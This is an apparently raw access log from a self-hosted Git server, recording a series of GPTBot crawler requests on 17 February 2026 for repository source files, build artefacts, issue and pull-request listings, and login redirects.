192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/index.html" -[17/Feb/2026:18:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/index.html" -[17/Feb/2026:18:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12059] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 10982] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:18:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__init__.py?display=source" [Client 74.7.227.38] [Length 13127] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__init__.py" -[17/Feb/2026:18:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__init__.py?display=source" [Client 74.7.227.38] [Length 13159] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__init__.py" -[17/Feb/2026:18:24:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=source" [Client 74.7.227.38] [Length 13557] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:18:24:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=rendered" [Client 74.7.227.38] [Length 12766] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:18:24:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:24:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:24:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/i18n.js?display=source" [Client 74.7.227.38] [Length 26570] [Gzip 6.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/i18n.js" -[17/Feb/2026:18:24:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11901] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json" -[17/Feb/2026:18:24:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json?display=source" [Client 74.7.227.38] [Length 11092] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json" -[17/Feb/2026:18:24:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11319] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json" -[17/Feb/2026:18:24:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json" -[17/Feb/2026:18:24:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:24:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:24:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:24:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/build.ninja?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:18:24:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11638] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:24:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18938] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:24:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18927] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:24:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11634] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:24:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11636] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:24:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:24:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18937] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:24:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:24:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/build.ninja?display=source" [Client 74.7.227.38] [Length 16435] [Gzip 5.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:18:24:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:24:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11127] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:24:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11126] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:24:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:24:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 11674] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties" -[17/Feb/2026:18:24:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" -[17/Feb/2026:18:24:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9953] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" -[17/Feb/2026:18:24:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 33302] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:24:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11614] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:24:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11617] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:24:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 14795] [Gzip 5.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:24:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 33294] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:24:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11615] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11614] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 14821] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:24:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" -[17/Feb/2026:18:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/Properties/launchSettings.json" -[17/Feb/2026:18:24:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" -[17/Feb/2026:18:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/Properties/launchSettings.json" 